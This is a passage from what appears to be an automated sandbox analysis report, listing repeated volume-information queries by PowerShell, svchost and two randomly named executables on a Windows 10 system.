Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\Program\iusb3mon.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
